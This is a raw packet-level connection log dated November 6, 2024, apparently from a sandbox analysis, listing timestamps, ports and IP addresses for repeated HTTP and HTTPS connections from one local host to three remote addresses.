Nov 6, 2024 17:02:51.079356909 CET	56874	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:51.079356909 CET	56843	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:51.084742069 CET	80	56874	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:51.084826946 CET	56874	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:51.085011005 CET	56874	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:51.091062069 CET	80	56874	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:51.113651037 CET	80	56843	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:51.113786936 CET	56843	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:51.152121067 CET	443	56870	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.153837919 CET	56870	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.153863907 CET	443	56870	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.154201984 CET	56870	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.154207945 CET	443	56870	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.172007084 CET	443	56869	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:51.172106028 CET	443	56869	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:51.172399044 CET	56869	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:51.173837900 CET	56869	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:51.176871061 CET	56864	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:51.177850962 CET	56875	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:51.182254076 CET	80	56864	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:51.182498932 CET	56864	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:51.182923079 CET	80	56875	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:51.183280945 CET	56875	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:51.183412075 CET	56875	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:51.188400984 CET	80	56875	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:51.281537056 CET	443	56870	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.281630993 CET	443	56870	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.281722069 CET	56870	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.282040119 CET	56870	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.282059908 CET	443	56870	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.282084942 CET	56870	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.282089949 CET	443	56870	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.284719944 CET	56876	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.284750938 CET	443	56876	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.285079002 CET	56876	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.285079002 CET	56876	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.285101891 CET	443	56876	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.362974882 CET	443	56871	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.363476992 CET	56871	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.363506079 CET	443	56871	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.363948107 CET	56871	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.363960981 CET	443	56871	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.421185017 CET	443	56872	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.421741009 CET	56872	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.421757936 CET	443	56872	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.422205925 CET	56872	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.422213078 CET	443	56872	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.492799044 CET	443	56871	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.492902040 CET	443	56871	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.493041039 CET	56871	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.493084908 CET	56871	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.493099928 CET	443	56871	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.493113995 CET	56871	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.493119001 CET	443	56871	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.495732069 CET	56877	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.495765924 CET	443	56877	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.495886087 CET	56877	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.496047020 CET	56877	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.496056080 CET	443	56877	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.526937962 CET	443	56873	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.527394056 CET	56873	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.527427912 CET	443	56873	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.527853966 CET	56873	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.527863026 CET	443	56873	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.551117897 CET	443	56872	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.551213026 CET	443	56872	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.551331043 CET	56872	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.551395893 CET	56872	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.551395893 CET	56872	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.551419973 CET	443	56872	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.551431894 CET	443	56872	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.554925919 CET	56878	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.554991007 CET	443	56878	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.555102110 CET	56878	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.555282116 CET	56878	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.555294991 CET	443	56878	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.663795948 CET	443	56873	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.663899899 CET	443	56873	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.663949966 CET	56873	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.664108992 CET	56873	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.664125919 CET	443	56873	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.666997910 CET	56879	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.667030096 CET	443	56879	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.667126894 CET	56879	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.667247057 CET	56879	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:51.667252064 CET	443	56879	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:51.950792074 CET	80	56874	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:51.991301060 CET	56880	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:51.991345882 CET	443	56880	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:51.991533041 CET	56880	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:51.998784065 CET	56880	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:51.998795986 CET	443	56880	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:52.005297899 CET	56874	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:52.031490088 CET	443	56876	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.062014103 CET	56876	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.062033892 CET	443	56876	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.065993071 CET	56876	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.066001892 CET	443	56876	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.194586039 CET	443	56876	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.194657087 CET	443	56876	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.197746038 CET	56876	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.238951921 CET	443	56877	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.254709005 CET	56876	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.254734039 CET	443	56876	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.254755974 CET	56876	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.254764080 CET	443	56876	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.269313097 CET	56877	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.269335032 CET	443	56877	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.269763947 CET	56877	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.269771099 CET	443	56877	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.285614967 CET	443	56878	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.333408117 CET	56878	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.342128992 CET	56878	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.342144012 CET	443	56878	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.379285097 CET	56878	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.379302979 CET	443	56878	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.396816015 CET	443	56877	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.396939993 CET	443	56877	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.396989107 CET	56877	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.403461933 CET	443	56879	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.458395958 CET	56879	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.497669935 CET	56877	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.497701883 CET	443	56877	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.497719049 CET	56877	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.497725010 CET	443	56877	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.501930952 CET	56879	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.501944065 CET	443	56879	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.502507925 CET	56879	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.502516031 CET	443	56879	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.505728960 CET	443	56878	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.505892038 CET	443	56878	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.505938053 CET	56878	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.509818077 CET	56878	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.509844065 CET	443	56878	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.509862900 CET	56878	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.509871006 CET	443	56878	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.521524906 CET	56881	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.521555901 CET	443	56881	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.521646023 CET	56881	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.522499084 CET	56882	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.522531033 CET	443	56882	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.522578001 CET	56882	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.522813082 CET	56882	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.522821903 CET	443	56882	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.524163008 CET	56883	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.524182081 CET	443	56883	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.524251938 CET	56883	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.525300026 CET	56881	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.525316000 CET	443	56881	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.525608063 CET	56883	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.525619030 CET	443	56883	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.629014969 CET	443	56879	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.629190922 CET	443	56879	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.629256010 CET	56879	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.635201931 CET	56879	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.635222912 CET	443	56879	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.641011000 CET	443	56880	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:52.664953947 CET	56884	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.664988041 CET	443	56884	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.665041924 CET	56884	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.667242050 CET	56880	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:52.667267084 CET	443	56880	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:52.668348074 CET	56884	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:52.668364048 CET	443	56884	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:52.819643974 CET	443	56880	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:52.819724083 CET	443	56880	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:52.819780111 CET	56880	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:52.824393988 CET	56880	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:52.832575083 CET	56874	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:52.836389065 CET	56885	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:52.838213921 CET	80	56874	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:52.838260889 CET	56874	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:52.841264963 CET	80	56885	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:52.841321945 CET	56885	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:52.841434002 CET	56885	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:52.846640110 CET	80	56885	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:53.052979946 CET	80	56875	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:53.054406881 CET	56886	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:53.054454088 CET	443	56886	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:53.054512024 CET	56886	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:53.054806948 CET	56886	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:53.054820061 CET	443	56886	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:53.099025965 CET	56875	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:53.242878914 CET	443	56881	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.243375063 CET	56881	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.243392944 CET	443	56881	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.243817091 CET	56881	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.243825912 CET	443	56881	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.282716036 CET	443	56882	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.283227921 CET	56882	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.283256054 CET	443	56882	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.283724070 CET	56882	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.283735037 CET	443	56882	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.370912075 CET	443	56881	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.371244907 CET	443	56881	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.371309996 CET	56881	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.371395111 CET	56881	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.371395111 CET	56881	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.371412039 CET	443	56881	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.371421099 CET	443	56881	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.374012947 CET	56887	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.374047041 CET	443	56887	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.374125957 CET	56887	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.374291897 CET	56887	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.374303102 CET	443	56887	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.403260946 CET	443	56884	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.403760910 CET	56884	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.403795004 CET	443	56884	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.404232025 CET	56884	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.404238939 CET	443	56884	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.417129993 CET	443	56882	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.417222977 CET	443	56882	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.417278051 CET	56882	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.417428017 CET	56882	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.417428017 CET	56882	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.417448044 CET	443	56882	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.417459011 CET	443	56882	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.420387030 CET	56888	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.420424938 CET	443	56888	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.420639992 CET	56888	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.420793056 CET	56888	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.420804024 CET	443	56888	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.466815948 CET	443	56883	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.467302084 CET	56883	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.467323065 CET	443	56883	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.467746019 CET	56883	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.467751026 CET	443	56883	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.534495115 CET	443	56884	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.534574032 CET	443	56884	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.534635067 CET	56884	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.534832001 CET	56884	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.534847021 CET	443	56884	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.534863949 CET	56884	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.534868956 CET	443	56884	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.538079977 CET	56889	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.538117886 CET	443	56889	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.538187027 CET	56889	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.538352966 CET	56889	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.538366079 CET	443	56889	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.607384920 CET	443	56883	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.607467890 CET	443	56883	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.607700109 CET	56883	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.607700109 CET	56883	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.607800961 CET	56883	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.607820034 CET	443	56883	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.610758066 CET	56890	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.610794067 CET	443	56890	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.611080885 CET	56890	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.611207008 CET	56890	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:53.611217022 CET	443	56890	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:53.996678114 CET	80	56885	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:53.997026920 CET	80	56885	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:53.997144938 CET	56885	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:53.998306990 CET	56891	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:53.998344898 CET	443	56891	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:53.998409986 CET	56891	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:53.998759985 CET	56891	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:53.998773098 CET	443	56891	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:53.999155998 CET	443	56886	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:54.001322985 CET	56886	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:54.001353025 CET	443	56886	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:54.123191118 CET	443	56887	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.123689890 CET	56887	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.123713017 CET	443	56887	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.124174118 CET	56887	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.124185085 CET	443	56887	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.160975933 CET	443	56886	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:54.161056042 CET	443	56886	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:54.161112070 CET	56886	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:54.161824942 CET	56886	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:54.162437916 CET	443	56888	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.163080931 CET	56888	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.163099051 CET	443	56888	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.163563967 CET	56888	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.163569927 CET	443	56888	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.165529013 CET	56875	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:54.166568995 CET	56892	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:54.171055079 CET	80	56875	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:54.171108961 CET	56875	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:54.171637058 CET	80	56892	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:54.171703100 CET	56892	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:54.171794891 CET	56892	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:54.176635981 CET	80	56892	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:54.252496958 CET	443	56887	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.252829075 CET	443	56887	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.252882004 CET	56887	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.252914906 CET	56887	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.252933025 CET	443	56887	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.252947092 CET	56887	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.252952099 CET	443	56887	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.256047964 CET	56893	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.256083012 CET	443	56893	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.256253004 CET	56893	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.256280899 CET	56893	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.256287098 CET	443	56893	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.278290033 CET	443	56889	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.278697014 CET	56889	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.278719902 CET	443	56889	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.279134989 CET	56889	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.279139996 CET	443	56889	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.296389103 CET	443	56888	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.296498060 CET	443	56888	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.296550035 CET	56888	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.296665907 CET	56888	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.296674967 CET	443	56888	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.296689987 CET	56888	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.296694040 CET	443	56888	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.299659014 CET	56894	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.299689054 CET	443	56894	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.299784899 CET	56894	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.300004005 CET	56894	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.300013065 CET	443	56894	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.358002901 CET	443	56890	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.359551907 CET	56890	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.359566927 CET	443	56890	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.360486031 CET	56890	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.360496044 CET	443	56890	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.407953024 CET	443	56889	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.408164024 CET	443	56889	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.408219099 CET	56889	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.408272982 CET	56889	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.408288956 CET	443	56889	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.408298969 CET	56889	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.408303976 CET	443	56889	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.411052942 CET	56895	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.411083937 CET	443	56895	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.411254883 CET	56895	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.411432028 CET	56895	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.411443949 CET	443	56895	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.490422010 CET	443	56890	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.490748882 CET	443	56890	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.490807056 CET	56890	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.518762112 CET	56890	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.518762112 CET	56890	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.518786907 CET	443	56890	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.518796921 CET	443	56890	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.522170067 CET	56896	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.522195101 CET	443	56896	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.522262096 CET	56896	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.522592068 CET	56896	443	192.168.2.6	13.107.246.45
